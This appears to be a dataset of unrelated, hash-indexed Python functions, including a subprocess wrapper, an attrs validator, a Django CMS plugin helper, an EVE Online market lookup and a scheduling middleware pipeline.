call_request = CallRequest(cmd_args, suppress_output=suppress_output)
call_result = call_request.run()
if call_result.exitval:
logger.error('`{}` returned error code {}'.format(' '.join(cmd_args), call_result.exitval))
return call_result
|
1556d52de9d620e74c8a4b946c3120cf3579dede
| 20,186 |
def provides(interface):
"""
A validator that raises a :exc:`TypeError` if the initializer is called
with an object that does not provide the requested *interface* (checks are
performed using ``interface.providedBy(value)`` (see `zope.interface
<http://docs.zope.org/zope.interface/>`_).
:param interface: The interface to check for.
:type interface: zope.interface.Interface
The :exc:`TypeError` is raised with a human readable error message, the
attribute (of type :class:`attr.Attribute`), the expected interface, and
the value it got.
"""
return _ProvidesValidator(interface)
|
9b6e29aa8c3e0a1757daa1c0f3eb455ec66fa594
| 20,187 |
def v_t(r):
"""
Mean thermal velocity
"""
return (8/np.pi)**0.5*c(r)
|
af475d1376a549abe501b7b47e5f9fa35d8258c1
| 20,188 |
from typing import Callable
from typing import cast
def _state_stateful_alarm_controller(
select_state: Callable[[str], OverkizStateType]
) -> str:
"""Return the state of the device."""
if state := cast(str, select_state(OverkizState.CORE_ACTIVE_ZONES)):
# The Stateful Alarm Controller has 3 zones with the following options:
# (A, B, C, A,B, B,C, A,C, A,B,C). Since it is not possible to map this to AlarmControlPanel entity,
# only the most important zones are mapped, other zones can only be disarmed.
if state in MAP_CORE_ACTIVE_ZONES:
return MAP_CORE_ACTIVE_ZONES[state]
return STATE_ALARM_ARMED_CUSTOM_BYPASS
return STATE_ALARM_DISARMED
|
3663d8dda26586dae416ce6d5dbe55fafdb821c8
| 20,189 |
def _connect_new_volume(module, array, answer=False):
"""Connect volume to host"""
api_version = array._list_available_rest_versions()
if AC_REQUIRED_API_VERSION in api_version and module.params['lun']:
try:
array.connect_host(module.params['host'],
module.params['volume'],
lun=module.params['lun'])
answer = True
except Exception:
module.fail_json(msg='LUN ID {0} invalid. Check for duplicate LUN IDs.'.format(module.params['lun']))
else:
array.connect_host(module.params['host'], module.params['volume'])
answer = True
return answer
|
f6b5dea4e78f832b536fdc269dfe1b9c040cb9b7
| 20,190 |
def is_mongo_configured(accessor):
"""
works out if mongodb is configured to run with trackerdash
i.e. first time running
"""
return accessor.verify_essential_collections_present()
|
c0487f6d899e6cee4f6bbb31bffbd17890812c30
| 20,191 |
from cms.api import add_plugin
def create_default_children_plugins(request, placeholder, lang, parent_plugin, children_conf):
"""
Create all default children plugins in the given ``placeholder``.
If a child have children, this function recurse.
Return all children and grandchildren (etc.) created
"""
children = list()
grandchildren = list()
for conf in children_conf:
if not permissions.has_plugin_permission(request.user, conf['plugin_type'], "add"):
continue
plugin = add_plugin(placeholder, conf['plugin_type'], lang, **conf['values'])
plugin.parent = parent_plugin
plugin.save()
if 'children' in conf:
            grandchildren += create_default_children_plugins(request, placeholder, lang, plugin, conf['children'])
plugin.notify_on_autoadd(request, conf)
children.append(plugin)
parent_plugin.notify_on_autoadd_children(request, conf, children)
return children + grandchildren
|
121106100c50d7ebdace254b711e6d31611dbf3d
| 20,192 |
import sympy
import math
def _split_value_equally(delta, count):
"""Splits an integer or rational into roughly equal parts."""
numer = sympy.numer(delta)
denom = sympy.denom(delta)
return [int(math.floor((numer + i) / count)) / denom for i in range(count)]
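# Usage sketch (illustrative, not part of the original source): the parts
# differ by at most one unit of the denominator and always sum back to the
# original value.
def _example_split_value_equally():
    return (_split_value_equally(sympy.Integer(7), 3),        # [2, 2, 3]
            _split_value_equally(sympy.Rational(1, 2), 2))    # [0, 1/2]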
|
e241444100b2e0f3c1a589d87c41aa8710fe5b8e
| 20,193 |
import ast
def maybe_get_docstring(node: ast.AST):
"""Get docstring from a constant expression, or return None."""
if (
isinstance(node, ast.Expr)
and isinstance(node.value, ast.Constant)
and isinstance(node.value.value, str)
):
return node.value.value
elif (
isinstance(node, ast.Expr)
and isinstance(node.value, ast.Str)
):
return node.value.s
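# Usage sketch (illustrative, not part of the original source): extract the
# docstring expression from a parsed module body; non-docstring nodes yield
# None.
def _example_maybe_get_docstring():
    tree = ast.parse('"""Module docstring."""\nx = 1\n')
    return maybe_get_docstring(tree.body[0]), maybe_get_docstring(tree.body[1])
    # -> ("Module docstring.", None)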
|
23171c739f3c9ae6d62ecf3307ac7c3409852d6b
| 20,194 |
import logging
def part_work(NPCorpsList):
"""获取军团LP兑换物品及其信息
Args:
NPCorpList: NPC军团id列表
Returns:
NPCorpList: 可以兑换物品的NPC军团id列表
[123,124,125...244,245,246]
NPCorps: 可以兑换物品的NPC军团信息字典,key为id
[
'物品id': {
'info': {
"ceo_id": 3004049,
"corporation_description": "",
"corporation_name": "CBD社团",
"creator_id": 1,
"member_count": 0,
"tax_rate": 0,
"ticker": "CBDC",
"url": "None"
},
'lp_store': {
"isk_cost": 2400000,
"lp_cost": 2400,
"offer_id": 3584,
"quantity": 5000,
"required_items": [
{
"quantity": 5000,
"type_id": 234
}
],
"type_id": 23047
},
}
]
names: 物品信息字典,key为id
{
"23047": {
"category": "inventory_type",
"id": 23047,
"name": "加达里海军铅质轨道弹 L",
"jita": {
"all": {
"max": 30000000,
"min": 0.01,
"volume": 8102161635
},
"buy": {
"max": 14.86,
"min": 0.01,
"volume": 2893652791
},
"sell": {
"max": 30000000,
"min": 15.23,
"volume": 5208508844
}
}
}
}
"""
NPCorpsList, NPCorps, ids_list = getCorp(NPCorpsList)
if 0 == len(ids_list) or 0 == len(NPCorpsList):
return None, None, None
try:
Names = []
for i in range(0, len(ids_list), 255):
Names += getCHName(ids_list[i: min(i + 255, len(ids_list))])
except Exception as E:
logging.error(E)
return None, None, None
logging.info("get Chinese Name Successed!")
names = {}
for name in Names:
try:
name["jita"] = getValue(name["id"])
except Exception as E:
logging.error(E)
else:
names["{}".format(name["id"])] = name
logging.info("get Jita Market Successed!")
return NPCorpsList, NPCorps, names
|
96e85555a5aa74c6f065c897938ffd4c6d970739
| 20,195 |
def read_metadata(image_dir_path):
"""Read image metadata from an image directory."""
return jsons.load_dataobject(
ImageMetadata, _get_metadata_path(image_dir_path)
)
|
132306a228550ebff155d83e3c3d5020aad0263a
| 20,196 |
import numpy as np
def subtract(list_1, list_2):
"""Subtracts list_2 from list_1 even if they are different lengths.
Length of the returned list will be the length of the shortest list supplied.
Index 0 is treated as the oldest, and the older list items are truncated.
Args:
list_1 (list of float): List to be subtracted from
list_2 (list of float): List to subtract
Returns:
list of float: result of list_1 - list_2
"""
offset = len(list_1) - len(list_2)
return list(np.array(list_1[offset:]) - np.array(list_2))
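# Usage sketch (illustrative, not part of the original source): the longer
# (older) list is truncated from the front before the element-wise
# subtraction.
def _example_subtract():
    return subtract([1, 2, 3, 4], [1, 1, 1])   # -> [1, 2, 3]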
|
e41b02a6875ea971ffded30f82b1b51bcd33b9e8
| 20,197 |
def get_available_time_slots() -> list:
"""
An application is ready for scheduling when all the payment rules are satisfied plus:
- the application has been paid
- the window to schedule the review has not elapsed
"""
return [
{"try": middleware.create_correlation_id, "fail": []},
{"try": middleware.determine_current_datetime, "fail": []},
{"try": middleware.clean_prohibition_number, "fail": []},
{"try": middleware.validate_prohibition_number, "fail": []},
{"try": middleware.get_vips_status, "fail": []},
{"try": middleware.prohibition_exists_in_vips, "fail": []},
{"try": middleware.user_submitted_last_name_matches_vips, "fail": []},
{"try": middleware.application_has_been_saved_to_vips, "fail": []},
{"try": middleware.get_payment_status, "fail": []},
{"try": middleware.received_valid_payment_status, "fail": []},
{"try": middleware.paid_not_more_than_24hrs_ago, "fail": []},
{"try": middleware.application_has_been_paid, "fail": []},
{"try": middleware.review_has_not_been_scheduled, "fail": []},
{"try": middleware.get_application_details, "fail": []},
{"try": middleware.valid_application_received_from_vips, "fail": []},
{"try": middleware.get_invoice_details, "fail": []},
{"try": middleware.calculate_schedule_window, "fail": []},
{"try": middleware.query_review_times_available, "fail": []},
{"try": middleware.does_applicant_have_enough_review_options, "fail": [
{"try": middleware.query_for_additional_review_times, "fail": []},
{"try": middleware.does_applicant_have_enough_review_options, "fail": [
{"try": rsi_email.insufficient_reviews_available, "fail": []},
]}
]},
]
|
9e04168f908abd0a9c37c969769477fc04cbd805
| 20,198 |
def library_detail(request, lib_id):
"""
Display information about all the flowcells a library has been run on.
"""
lib = get_object_or_404(Library, id=lib_id)
flowcell_list = []
flowcell_run_results = {} # aka flowcells we're looking at
for lane in lib.lane_set.all():
fc = lane.flowcell
flowcell_id, id = parse_flowcell_id(fc.flowcell_id)
if flowcell_id not in flowcell_run_results:
flowcell_run_results[flowcell_id] = get_flowcell_result_dict(flowcell_id)
flowcell_list.append((fc.flowcell_id, lane.lane_number))
flowcell_list.sort()
lane_summary_list = []
eland_results = []
for fc, lane_number in flowcell_list:
lane_summary, err_list = _summary_stats(fc, lane_number, lib_id)
lane_summary_list.extend(lane_summary)
eland_results.extend(_make_eland_results(fc, lane_number, flowcell_run_results))
context = {
'page_name': 'Library Details',
'lib': lib,
'eland_results': eland_results,
'lane_summary_list': lane_summary_list,
}
context.update(SAMPLES_CONTEXT_DEFAULTS)
return render(request, 'samples/library_detail.html', context)
|
493a0ababcb9da6bffd859044ac0a11e854b03d5
| 20,199 |